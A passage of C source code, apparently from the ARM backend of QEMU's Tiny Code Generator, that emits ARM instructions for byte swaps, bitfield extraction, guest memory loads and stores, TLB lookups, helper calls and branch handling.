TCG_REG_TMP, rn, SHIFT_IMM_LSR(8)); } } static inline void tcg_out_bswap16(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* rev16 */ tcg_out32(s, 0x06bf0fb0 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_MOV, TCG_REG_TMP, 0, rn, SHIFT_IMM_LSL(24)); tcg_out_dat_reg(s, cond, ARITH_MOV, TCG_REG_TMP, 0, TCG_REG_TMP, SHIFT_IMM_LSR(16)); tcg_out_dat_reg(s, cond, ARITH_ORR, rd, TCG_REG_TMP, rn, SHIFT_IMM_LSR(8)); } } /* swap the two low bytes assuming that the two high input bytes and the two high output bit can hold any value. */ static inline void tcg_out_bswap16st(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* rev16 */ tcg_out32(s, 0x06bf0fb0 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_MOV, TCG_REG_TMP, 0, rn, SHIFT_IMM_LSR(8)); tcg_out_dat_imm(s, cond, ARITH_AND, TCG_REG_TMP, TCG_REG_TMP, 0xff); tcg_out_dat_reg(s, cond, ARITH_ORR, rd, TCG_REG_TMP, rn, SHIFT_IMM_LSL(8)); } } static inline void tcg_out_bswap32(TCGContext *s, int cond, int rd, int rn) { if (use_armv6_instructions) { /* rev */ tcg_out32(s, 0x06bf0f30 | (cond << 28) | (rd << 12) | rn); } else { tcg_out_dat_reg(s, cond, ARITH_EOR, TCG_REG_TMP, rn, rn, SHIFT_IMM_ROR(16)); tcg_out_dat_imm(s, cond, ARITH_BIC, TCG_REG_TMP, TCG_REG_TMP, 0xff | 0x800); tcg_out_dat_reg(s, cond, ARITH_MOV, rd, 0, rn, SHIFT_IMM_ROR(8)); tcg_out_dat_reg(s, cond, ARITH_EOR, rd, rd, TCG_REG_TMP, SHIFT_IMM_LSR(8)); } } static inline void tcg_out_deposit(TCGContext *s, int cond, TCGReg rd, TCGArg a1, int ofs, int len, bool const_a1) { if (const_a1) { /* bfi becomes bfc with rn == 15. */ a1 = 15; } /* bfi/bfc */ tcg_out32(s, 0x07c00010 | (cond << 28) | (rd << 12) | a1 | (ofs << 7) | ((ofs + len - 1) << 16)); } static inline void tcg_out_extract(TCGContext *s, int cond, TCGReg rd, TCGArg a1, int ofs, int len) { /* ubfx */ tcg_out32(s, 0x07e00050 | (cond << 28) | (rd << 12) | a1 | (ofs << 7) | ((len - 1) << 16)); } static inline void tcg_out_sextract(TCGContext *s, int cond, TCGReg rd, TCGArg a1, int ofs, int len) { /* sbfx */ tcg_out32(s, 0x07a00050 | (cond << 28) | (rd << 12) | a1 | (ofs << 7) | ((len - 1) << 16)); } static inline void tcg_out_ld32u(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xfff || offset < -0xfff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_ld32_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_ld32_12(s, cond, rd, rn, offset); } static inline void tcg_out_st32(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xfff || offset < -0xfff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_st32_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_st32_12(s, cond, rd, rn, offset); } static inline void tcg_out_ld16u(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xff || offset < -0xff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_ld16u_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_ld16u_8(s, cond, rd, rn, offset); } static inline void tcg_out_ld16s(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xff || offset < -0xff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_ld16s_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_ld16s_8(s, cond, rd, rn, offset); } static inline void tcg_out_st16(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xff || offset < -0xff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_st16_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_st16_8(s, cond, rd, rn, offset); } static inline void tcg_out_ld8u(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xfff || offset < -0xfff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_ld8_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_ld8_12(s, cond, rd, rn, offset); } static inline void tcg_out_ld8s(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xff || offset < -0xff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_ld8s_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_ld8s_8(s, cond, rd, rn, offset); } static inline void tcg_out_st8(TCGContext *s, int cond, int rd, int rn, int32_t offset) { if (offset > 0xfff || offset < -0xfff) { tcg_out_movi32(s, cond, TCG_REG_TMP, offset); tcg_out_st8_r(s, cond, rd, rn, TCG_REG_TMP); } else tcg_out_st8_12(s, cond, rd, rn, offset); } /* The _goto case is normally between TBs within the same code buffer, and * with the code buffer limited to 16MB we wouldn't need the long case. * But we also use it for the tail-call to the qemu_ld/st helpers, which does. */ static void tcg_out_goto(TCGContext *s, int cond, tcg_insn_unit *addr) { intptr_t addri = (intptr_t)addr; ptrdiff_t disp = tcg_pcrel_diff(s, addr); if ((addri & 1) == 0 && disp - 8 < 0x01fffffd && disp - 8 > -0x01fffffd) { tcg_out_b(s, cond, disp); return; } tcg_out_movi_pool(s, cond, TCG_REG_PC, addri); } /* The call case is mostly used for helpers - so it's not unreasonable * for them to be beyond branch range */ static void tcg_out_call(TCGContext *s, tcg_insn_unit *addr) { intptr_t addri = (intptr_t)addr; ptrdiff_t disp = tcg_pcrel_diff(s, addr); if (disp - 8 < 0x02000000 && disp - 8 >= -0x02000000) { if (addri & 1) { /* Use BLX if the target is in Thumb mode */ if (!use_armv5t_instructions) { tcg_abort(); } tcg_out_blx_imm(s, disp); } else { tcg_out_bl(s, COND_AL, disp); } } else if (use_armv7_instructions) { tcg_out_movi32(s, COND_AL, TCG_REG_TMP, addri); tcg_out_blx(s, COND_AL, TCG_REG_TMP); } else { /* ??? Know that movi_pool emits exactly 1 insn. */ tcg_out_dat_imm(s, COND_AL, ARITH_ADD, TCG_REG_R14, TCG_REG_PC, 0); tcg_out_movi_pool(s, COND_AL, TCG_REG_PC, addri); } } static inline void tcg_out_goto_label(TCGContext *s, int cond, TCGLabel *l) { if (l->has_value) { tcg_out_goto(s, cond, l->u.value_ptr); } else { tcg_out_reloc(s, s->code_ptr, R_ARM_PC24, l, 0); tcg_out_b(s, cond, 0); } } static inline void tcg_out_mb(TCGContext *s, TCGArg a0) { if (use_armv7_instructions) { tcg_out32(s, INSN_DMB_ISH); } else if (use_armv6_instructions) { tcg_out32(s, INSN_DMB_MCR); } } static TCGCond tcg_out_cmp2(TCGContext *s, const TCGArg *args, const int *const_args) { TCGReg al = args[0]; TCGReg ah = args[1]; TCGArg bl = args[2]; TCGArg bh = args[3]; TCGCond cond = args[4]; int const_bl = const_args[2]; int const_bh = const_args[3]; switch (cond) { case TCG_COND_EQ: case TCG_COND_NE: case TCG_COND_LTU: case TCG_COND_LEU: case TCG_COND_GTU: case TCG_COND_GEU: /* We perform a conditional comparision. If the high half is equal, then overwrite the flags with the comparison of the low half. The resulting flags cover the whole. */ tcg_out_dat_rI(s, COND_AL, ARITH_CMP, 0, ah, bh, const_bh); tcg_out_dat_rI(s, COND_EQ, ARITH_CMP, 0, al, bl, const_bl); return cond; case TCG_COND_LT: case TCG_COND_GE: /* We perform a double-word subtraction and examine the result. We do not actually need the result of the subtract, so the low part "subtract" is a compare. For the high half we have no choice but to compute into a temporary. */ tcg_out_dat_rI(s, COND_AL, ARITH_CMP, 0, al, bl, const_bl); tcg_out_dat_rI(s, COND_AL, ARITH_SBC | TO_CPSR, TCG_REG_TMP, ah, bh, const_bh); return cond; case TCG_COND_LE: case TCG_COND_GT: /* Similar, but with swapped arguments, via reversed subtract. */ tcg_out_dat_rI(s, COND_AL, ARITH_RSB | TO_CPSR, TCG_REG_TMP, al, bl, const_bl); tcg_out_dat_rI(s, COND_AL, ARITH_RSC | TO_CPSR, TCG_REG_TMP, ah, bh, const_bh); return tcg_swap_cond(cond); default: g_assert_not_reached(); } } #ifdef CONFIG_SOFTMMU #include "../tcg-ldst.inc.c" /* helper signature: helper_ret_ld_mmu(CPUState *env, target_ulong addr, * int mmu_idx, uintptr_t ra) */ static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_SB] = helper_ret_ldsb_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_LESW] = helper_le_ldsw_mmu, [MO_LESL] = helper_le_ldul_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BEQ] = helper_be_ldq_mmu, [MO_BESW] = helper_be_ldsw_mmu, [MO_BESL] = helper_be_ldul_mmu, }; /* helper signature: helper_ret_st_mmu(CPUState *env, target_ulong addr, * uintxx_t val, int mmu_idx, uintptr_t ra) */ static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; /* Helper routines for marshalling helper function arguments into * the correct registers and stack. * argreg is where we want to put this argument, arg is the argument itself. * Return value is the updated argreg ready for the next call. * Note that argreg 0..3 is real registers, 4+ on stack. * * We provide routines for arguments which are: immediate, 32 bit * value in register, 16 and 8 bit values in register (which must be zero * extended before use) and 64 bit value in a lo:hi register pair. */ #define DEFINE_TCG_OUT_ARG(NAME, ARGTYPE, MOV_ARG, EXT_ARG) \ static TCGReg NAME(TCGContext *s, TCGReg argreg, ARGTYPE arg) \ { \ if (argreg < 4) { \ MOV_ARG(s, COND_AL, argreg, arg); \ } else { \ int ofs = (argreg - 4) * 4; \ EXT_ARG; \ tcg_debug_assert(ofs + 4 <= TCG_STATIC_CALL_ARGS_SIZE); \ tcg_out_st32_12(s, COND_AL, arg, TCG_REG_CALL_STACK, ofs); \ } \ return argreg + 1; \ } DEFINE_TCG_OUT_ARG(tcg_out_arg_imm32, uint32_t, tcg_out_movi32, (tcg_out_movi32(s, COND_AL, TCG_REG_TMP, arg), arg = TCG_REG_TMP)) DEFINE_TCG_OUT_ARG(tcg_out_arg_reg8, TCGReg, tcg_out_ext8u, (tcg_out_ext8u(s, COND_AL, TCG_REG_TMP, arg), arg = TCG_REG_TMP)) DEFINE_TCG_OUT_ARG(tcg_out_arg_reg16, TCGReg, tcg_out_ext16u, (tcg_out_ext16u(s, COND_AL, TCG_REG_TMP, arg), arg = TCG_REG_TMP)) DEFINE_TCG_OUT_ARG(tcg_out_arg_reg32, TCGReg, tcg_out_mov_reg, ) static TCGReg tcg_out_arg_reg64(TCGContext *s, TCGReg argreg, TCGReg arglo, TCGReg arghi) { /* 64 bit arguments must go in even/odd register pairs * and in 8-aligned stack slots. */ if (argreg & 1) { argreg++; } if (use_armv6_instructions && argreg >= 4 && (arglo & 1) == 0 && arghi == arglo + 1) { tcg_out_strd_8(s, COND_AL, arglo, TCG_REG_CALL_STACK, (argreg - 4) * 4); return argreg + 2; } else { argreg = tcg_out_arg_reg32(s, argreg, arglo); argreg = tcg_out_arg_reg32(s, argreg, arghi); return argreg; } } #define TLB_SHIFT (CPU_TLB_ENTRY_BITS + CPU_TLB_BITS) /* We expect to use an 9-bit sign-magnitude negative offset from ENV. */ QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -256); /* These offsets are built into the LDRD below. */ QEMU_BUILD_BUG_ON(offsetof(CPUTLBDescFast, mask) != 0); QEMU_BUILD_BUG_ON(offsetof(CPUTLBDescFast, table) != 4); /* Load and compare a TLB entry, leaving the flags set. Returns the register containing the addend of the tlb entry. Clobbers R0, R1, R2, TMP. */ static TCGReg tcg_out_tlb_read(TCGContext *s, TCGReg addrlo, TCGReg addrhi, MemOp opc, int mem_index, bool is_load) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif int cmp_off = (is_load ? offsetof(CPUTLBEntry, addr_read) : offsetof(CPUTLBEntry, addr_write)); int fast_off = TLB_MASK_TABLE_OFS(mem_index); int mask_off = fast_off + offsetof(CPUTLBDescFast, mask); int table_off = fast_off + offsetof(CPUTLBDescFast, table); unsigned s_bits = opc & MO_SIZE; unsigned a_bits = get_alignment_bits(opc); /* * We don't support inline unaligned acceses, but we can easily * support overalignment checks. */ if (a_bits < s_bits) { a_bits = s_bits; } /* Load env_tlb(env)->f[mmu_idx].{mask,table} into {r0,r1}. */ if (use_armv6_instructions) { tcg_out_ldrd_8(s, COND_AL, TCG_REG_R0, TCG_AREG0, fast_off); } else { tcg_out_ld(s, TCG_TYPE_I32, TCG_REG_R0, TCG_AREG0, mask_off); tcg_out_ld(s, TCG_TYPE_I32, TCG_REG_R1, TCG_AREG0, table_off); } /* Extract the tlb index from the address into R0. */ tcg_out_dat_reg(s, COND_AL, ARITH_AND, TCG_REG_R0, TCG_REG_R0, addrlo, SHIFT_IMM_LSR(TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS)); /* * Add the tlb_table pointer, creating the CPUTLBEntry address in R1. * Load the tlb comparator into R2/R3 and the fast path addend into R1. */ if (cmp_off == 0) { if (use_armv6_instructions && TARGET_LONG_BITS == 64) { tcg_out_ldrd_rwb(s, COND_AL, TCG_REG_R2, TCG_REG_R1, TCG_REG_R0); } else { tcg_out_ld32_rwb(s, COND_AL, TCG_REG_R2, TCG_REG_R1, TCG_REG_R0); } } else { tcg_out_dat_reg(s, COND_AL, ARITH_ADD, TCG_REG_R1, TCG_REG_R1, TCG_REG_R0, 0); if (use_armv6_instructions && TARGET_LONG_BITS == 64) { tcg_out_ldrd_8(s, COND_AL, TCG_REG_R2, TCG_REG_R1, cmp_off); } else { tcg_out_ld32_12(s, COND_AL, TCG_REG_R2, TCG_REG_R1, cmp_off); } } if (!use_armv6_instructions && TARGET_LONG_BITS == 64) { tcg_out_ld32_12(s, COND_AL, TCG_REG_R3, TCG_REG_R1, cmp_off + 4); } /* Load the tlb addend. */ tcg_out_ld32_12(s, COND_AL, TCG_REG_R1, TCG_REG_R1, offsetof(CPUTLBEntry, addend)); /* * Check alignment, check comparators. * Do this in no more than 3 insns. Use MOVW for v7, if possible, * to reduce the number of sequential conditional instructions. * Almost all guests have at least 4k pages, which means that we need * to clear at least 9 bits even for an 8-byte memory, which means it * isn't worth checking for an immediate operand for BIC. */ if (use_armv7_instructions && TARGET_PAGE_BITS <= 16) { tcg_target_ulong mask = ~(TARGET_PAGE_MASK | ((1 << a_bits) - 1)); tcg_out_movi32(s, COND_AL, TCG_REG_TMP, mask); tcg_out_dat_reg(s, COND_AL, ARITH_BIC, TCG_REG_TMP, addrlo, TCG_REG_TMP, 0); tcg_out_dat_reg(s, COND_AL, ARITH_CMP, 0, TCG_REG_R2, TCG_REG_TMP, 0); } else { if (a_bits) { tcg_out_dat_imm(s, COND_AL, ARITH_TST, 0, addrlo, (1 << a_bits) - 1); } tcg_out_dat_reg(s, COND_AL, ARITH_MOV, TCG_REG_TMP, 0, addrlo, SHIFT_IMM_LSR(TARGET_PAGE_BITS)); tcg_out_dat_reg(s, (a_bits ? COND_EQ : COND_AL), ARITH_CMP, 0, TCG_REG_R2, TCG_REG_TMP, SHIFT_IMM_LSL(TARGET_PAGE_BITS)); } if (TARGET_LONG_BITS == 64) { tcg_out_dat_reg(s, COND_EQ, ARITH_CMP, 0, TCG_REG_R3, addrhi, 0); } return TCG_REG_R1; } /* Record the context of a call to the out of line helper code for the slow path for a load or store, so that we can later generate the correct helper code. */ static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOpIdx oi, TCGReg datalo, TCGReg datahi, TCGReg addrlo, TCGReg addrhi, tcg_insn_unit *raddr, tcg_insn_unit *label_ptr) { TCGLabelQemuLdst *label = new_ldst_label(s); label->is_ld = is_ld; label->oi = oi; label->datalo_reg = datalo; label->datahi_reg = datahi; label->addrlo_reg = addrlo; label->addrhi_reg = addrhi; label->raddr = raddr; label->label_ptr[0] = label_ptr; } static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGReg argreg, datalo, datahi; TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); void *func; if (!reloc_pc24(lb->label_ptr[0], s->code_ptr)) { return false; } argreg = tcg_out_arg_reg32(s, TCG_REG_R0, TCG_AREG0); if (TARGET_LONG_BITS == 64) { argreg = tcg_out_arg_reg64(s, argreg, lb->addrlo_reg, lb->addrhi_reg); } else { argreg = tcg_out_arg_reg32(s, argreg, lb->addrlo_reg); } argreg = tcg_out_arg_imm32(s, argreg, oi); argreg = tcg_out_arg_reg32(s, argreg, TCG_REG_R14); /* For armv6 we can use the canonical unsigned helpers and minimize icache usage. For pre-armv6, use the signed helpers since we do not have a single insn sign-extend. */ if (use_armv6_instructions) { func = qemu_ld_helpers[opc & (MO_BSWAP | MO_SIZE)]; } else { func = qemu_ld_helpers[opc & (MO_BSWAP | MO_SSIZE)]; if (opc & MO_SIGN) { opc = MO_UL; } } tcg_out_call(s, func); datalo = lb->datalo_reg; datahi = lb->datahi_reg; switch (opc & MO_SSIZE) { case MO_SB: tcg_out_ext8s(s, COND_AL, datalo, TCG_REG_R0); break; case MO_SW: tcg_out_ext16s(s, COND_AL, datalo, TCG_REG_R0); break; default: tcg_out_mov_reg(s, COND_AL, datalo, TCG_REG_R0); break; case MO_Q: if (datalo != TCG_REG_R1) { tcg_out_mov_reg(s, COND_AL, datalo, TCG_REG_R0); tcg_out_mov_reg(s, COND_AL, datahi, TCG_REG_R1); } else if (datahi != TCG_REG_R0) { tcg_out_mov_reg(s, COND_AL, datahi, TCG_REG_R1); tcg_out_mov_reg(s, COND_AL, datalo, TCG_REG_R0); } else { tcg_out_mov_reg(s, COND_AL, TCG_REG_TMP, TCG_REG_R0); tcg_out_mov_reg(s, COND_AL, datahi, TCG_REG_R1); tcg_out_mov_reg(s, COND_AL, datalo, TCG_REG_TMP); } break; } tcg_out_goto(s, COND_AL, lb->raddr); return true; } static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGReg argreg, datalo, datahi; TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); if (!reloc_pc24(lb->label_ptr[0], s->code_ptr)) { return false; } argreg = TCG_REG_R0; argreg = tcg_out_arg_reg32(s, argreg, TCG_AREG0); if (TARGET_LONG_BITS == 64) { argreg = tcg_out_arg_reg64(s, argreg, lb->addrlo_reg, lb->addrhi_reg); } else { argreg = tcg_out_arg_reg32(s, argreg, lb->addrlo_reg); } datalo = lb->datalo_reg; datahi = lb->datahi_reg; switch (opc & MO_SIZE) { case MO_8: argreg = tcg_out_arg_reg8(s, argreg, datalo); break; case MO_16: argreg = tcg_out_arg_reg16(s, argreg, datalo); break; case MO_32: default: argreg = tcg_out_arg_reg32(s, argreg, datalo); break; case MO_64: argreg = tcg_out_arg_reg64(s, argreg, datalo, datahi); break; } argreg = tcg_out_arg_imm32(s, argreg, oi); argreg = tcg_out_arg_reg32(s, argreg, TCG_REG_R14); /* Tail-call to the helper, which will return to the fast path. */ tcg_out_goto(s, COND_AL, qemu_st_helpers[opc & (MO_BSWAP | MO_SIZE)]); return true; } #endif /* SOFTMMU */ static inline void tcg_out_qemu_ld_index(TCGContext *s, MemOp opc, TCGReg datalo, TCGReg datahi, TCGReg addrlo, TCGReg addend) { MemOp bswap = opc & MO_BSWAP; switch (opc & MO_SSIZE) { case MO_UB: tcg_out_ld8_r(s, COND_AL, datalo, addrlo, addend); break; case MO_SB: tcg_out_ld8s_r(s, COND_AL, datalo, addrlo, addend); break; case MO_UW: tcg_out_ld16u_r(s, COND_AL, datalo, addrlo, addend); if (bswap) { tcg_out_bswap16(s, COND_AL, datalo, datalo); } break; case MO_SW: if (bswap) { tcg_out_ld16u_r(s, COND_AL, datalo, addrlo, addend); tcg_out_bswap16s(s, COND_AL, datalo, datalo); } else { tcg_out_ld16s_r(s, COND_AL, datalo, addrlo, addend); } break; case MO_UL: default: tcg_out_ld32_r(s, COND_AL, datalo, addrlo, addend); if (bswap) { tcg_out_bswap32(s, COND_AL, datalo, datalo); } break; case MO_Q: { TCGReg dl = (bswap ? datahi : datalo); TCGReg dh = (bswap ? datalo : datahi); /* Avoid ldrd for user-only emulation, to handle unaligned. */ if (USING_SOFTMMU && use_armv6_instructions && (dl & 1) == 0 && dh == dl + 1) { tcg_out_ldrd_r(s, COND_AL, dl, addrlo, addend); } else if (dl != addend) { tcg_out_ld32_rwb(s, COND_AL, dl, addend, addrlo); tcg_out_ld32_12(s, COND_AL, dh, addend, 4); } else { tcg_out_dat_reg(s, COND_AL, ARITH_ADD, TCG_REG_TMP, addend, addrlo, SHIFT_IMM_LSL(0)); tcg_out_ld32_12(s, COND_AL, dl, TCG_REG_TMP, 0); tcg_out_ld32_12(s, COND_AL, dh, TCG_REG_TMP, 4); } if (bswap) { tcg_out_bswap32(s, COND_AL, dl, dl); tcg_out_bswap32(s, COND_AL, dh, dh); } } break; } } static inline void tcg_out_qemu_ld_direct(TCGContext *s, MemOp opc, TCGReg datalo, TCGReg datahi, TCGReg addrlo) { MemOp bswap = opc & MO_BSWAP; switch (opc & MO_SSIZE) { case MO_UB: tcg_out_ld8_12(s, COND_AL, datalo, addrlo, 0); break; case MO_SB: tcg_out_ld8s_8(s, COND_AL, datalo, addrlo, 0); break; case MO_UW: tcg_out_ld16u_8(s, COND_AL, datalo, addrlo, 0); if (bswap) { tcg_out_bswap16(s, COND_AL, datalo, datalo); } break; case MO_SW: if (bswap) { tcg_out_ld16u_8(s, COND_AL, datalo, addrlo, 0); tcg_out_bswap16s(s, COND_AL, datalo, datalo); } else { tcg_out_ld16s_8(s, COND_AL, datalo, addrlo, 0); } break; case MO_UL: default: tcg_out_ld32_12(s, COND_AL, datalo, addrlo, 0); if (bswap) { tcg_out_bswap32(s, COND_AL, datalo, datalo); } break; case MO_Q: { TCGReg dl = (bswap ? datahi : datalo); TCGReg dh = (bswap ? datalo : datahi); /* Avoid ldrd for user-only emulation, to handle unaligned. */ if (USING_SOFTMMU && use_armv6_instructions && (dl & 1) == 0 && dh == dl + 1) { tcg_out_ldrd_8(s, COND_AL, dl, addrlo, 0); } else if (dl == addrlo) { tcg_out_ld32_12(s, COND_AL, dh, addrlo, bswap ? 0 : 4); tcg_out_ld32_12(s, COND_AL, dl, addrlo, bswap ? 4 : 0); } else { tcg_out_ld32_12(s, COND_AL, dl, addrlo, bswap ? 4 : 0); tcg_out_ld32_12(s, COND_AL, dh, addrlo, bswap ? 0 : 4); } if (bswap) { tcg_out_bswap32(s, COND_AL, dl, dl); tcg_out_bswap32(s, COND_AL, dh, dh); } } break; } } static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is64) { TCGReg addrlo, datalo, datahi, addrhi __attribute__((unused)); TCGMemOpIdx oi; MemOp opc; #ifdef CONFIG_SOFTMMU int mem_index; TCGReg addend; tcg_insn_unit *label_ptr; #endif datalo = *args++; datahi = (is64 ? *args++ : 0); addrlo = *args++; addrhi = (TARGET_LONG_BITS == 64 ? *args++ : 0); oi = *args++; opc = get_memop(oi); #ifdef CONFIG_SOFTMMU mem_index = get_mmuidx(oi); addend = tcg_out_tlb_read(s, addrlo, addrhi, opc, mem_index, 1); /* This a conditional BL only to load a pointer within this opcode into LR for the slow path. We will not be using the value for a tail call. */ label_ptr = s->code_ptr; tcg_out_bl(s, COND_NE, 0); tcg_out_qemu_ld_index(s, opc, datalo, datahi, addrlo, addend); add_qemu_ldst_label(s, true, oi, datalo, datahi, addrlo, addrhi, s->code_ptr, label_ptr); #else /* !CONFIG_SOFTMMU */ if (guest_base) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP, guest_base); tcg_out_qemu_ld_index(s, opc, datalo, datahi, addrlo, TCG_REG_TMP); } else { tcg_out_qemu_ld_direct(s, opc, datalo, datahi, addrlo); } #endif } static inline void tcg_out_qemu_st_index(TCGContext *s, int cond, MemOp opc, TCGReg datalo, TCGReg datahi, TCGReg addrlo, TCGReg addend) { MemOp bswap = opc & MO_BSWAP; switch (opc & MO_SIZE) { case MO_8: tcg_out_st8_r(s, cond, datalo, addrlo, addend); break; case MO_16: if (bswap) { tcg_out_bswap16st(s, cond, TCG_REG_R0, datalo); tcg_out_st16_r(s, cond, TCG_REG_R0, addrlo, addend); } else { tcg_out_st16_r(s, cond, datalo, addrlo, addend); } break; case MO_32: default: if (bswap) { tcg_out_bswap32(s, cond, TCG_REG_R0, datalo); tcg_out_st32_r(s, cond, TCG_REG_R0, addrlo, addend); } else { tcg_out_st32_r(s, cond, datalo, addrlo, addend); } break; case MO_64: /* Avoid strd for user-only emulation, to handle unaligned. */ if (bswap) { tcg_out_bswap32(s, cond, TCG_REG_R0, datahi); tcg_out_st32_rwb(s, cond, TCG_REG_R0, addend, addrlo); tcg_out_bswap32(s, cond, TCG_REG_R0, datalo); tcg_out_st32_12(s, cond, TCG_REG_R0, addend, 4); } else if (USING_SOFTMMU && use_armv6_instructions && (datalo & 1) == 0 && datahi == datalo + 1) { tcg_out_strd_r(s, cond, datalo, addrlo, addend); } else { tcg_out_st32_rwb(s, cond, datalo, addend, addrlo); tcg_out_st32_12(s, cond, datahi, addend, 4); } break; } } static inline void tcg_out_qemu_st_direct(TCGContext *s, MemOp opc, TCGReg datalo, TCGReg datahi, TCGReg addrlo) { MemOp bswap = opc & MO_BSWAP; switch (opc & MO_SIZE) { case MO_8: tcg_out_st8_12(s, COND_AL, datalo, addrlo, 0); break; case MO_16: if (bswap) { tcg_out_bswap16st(s, COND_AL, TCG_REG_R0, datalo); tcg_out_st16_8(s, COND_AL, TCG_REG_R0, addrlo, 0); } else { tcg_out_st16_8(s, COND_AL, datalo, addrlo, 0); } break; case MO_32: default: if (bswap) { tcg_out_bswap32(s, COND_AL, TCG_REG_R0, datalo); tcg_out_st32_12(s, COND_AL, TCG_REG_R0, addrlo, 0); } else { tcg_out_st32_12(s, COND_AL, datalo, addrlo, 0); } break; case MO_64: /* Avoid strd for user-only emulation, to handle unaligned. */ if (bswap) { tcg_out_bswap32(s, COND_AL, TCG_REG_R0, datahi); tcg_out_st32_12(s, COND_AL, TCG_REG_R0, addrlo, 0); tcg_out_bswap32(s, COND_AL, TCG_REG_R0, datalo); tcg_out_st32_12(s, COND_AL, TCG_REG_R0, addrlo, 4); } else if (USING_SOFTMMU && use_armv6_instructions && (datalo & 1) == 0 && datahi == datalo + 1) { tcg_out_strd_8(s, COND_AL, datalo, addrlo, 0); } else { tcg_out_st32_12(s, COND_AL, datalo, addrlo, 0); tcg_out_st32_12(s, COND_AL, datahi, addrlo, 4); } break; } } static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is64) { TCGReg addrlo, datalo, datahi, addrhi __attribute__((unused)); TCGMemOpIdx oi; MemOp opc; #ifdef CONFIG_SOFTMMU int mem_index; TCGReg addend; tcg_insn_unit *label_ptr; #endif datalo = *args++; datahi = (is64 ? *args++ : 0); addrlo = *args++; addrhi = (TARGET_LONG_BITS == 64 ? *args++ : 0); oi = *args++; opc = get_memop(oi); #ifdef CONFIG_SOFTMMU mem_index = get_mmuidx(oi); addend = tcg_out_tlb_read(s, addrlo, addrhi, opc, mem_index, 0); tcg_out_qemu_st_index(s, COND_EQ, opc, datalo, datahi, addrlo, addend); /* The conditional call must come last, as we're going to return here. */ label_ptr = s->code_ptr; tcg_out_bl(s, COND_NE, 0); add_qemu_ldst_label(s, false, oi, datalo, datahi, addrlo, addrhi, s->code_ptr, label_ptr); #else /* !CONFIG_SOFTMMU */ if (guest_base) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP, guest_base); tcg_out_qemu_st_index(s, COND_AL, opc, datalo, datahi, addrlo, TCG_REG_TMP); } else { tcg_out_qemu_st_direct(s, opc, datalo, datahi, addrlo); } #endif } static void tcg_out_epilogue(TCGContext *s); static inline void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, const int *const_args) { TCGArg a0, a1, a2, a3, a4, a5; int c; switch (opc) { case INDEX_op_exit_tb: tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R0, args[0]); tcg_out_epilogue(s); break; case INDEX_op_goto_tb: { /* Indirect jump method */ intptr_t ptr, dif, dil; TCGReg base = TCG_REG_PC; tcg_debug_assert(s->tb_jmp_insn_offset == 0); ptr = (intptr_t)(s->tb_jmp_target_addr + args[0]); dif = ptr - ((intptr_t)s->code_ptr + 8); dil = sextract32(dif, 0, 12); if (dif != dil) { /* The TB is close, but outside the 12 bits addressable by the load. We can extend this to 20 bits with a sub of a shifted immediate from pc. In the vastly unlikely event the code requires more than 1MB, we'll use 2 insns and be no worse off. */ base = TCG_REG_R0; tcg_out_movi32(s, COND_AL, base, ptr - dil); } tcg_out_ld32_12(s, COND_AL, TCG_REG_PC, base, dil); set_jmp_reset_offset(s, args[0]); } break; case INDEX_op_goto_ptr: tcg_out_bx(s, COND_AL, args[0]); break; case INDEX_op_br: tcg_out_goto_label(s, COND_AL, arg_label(args[0])); break; case 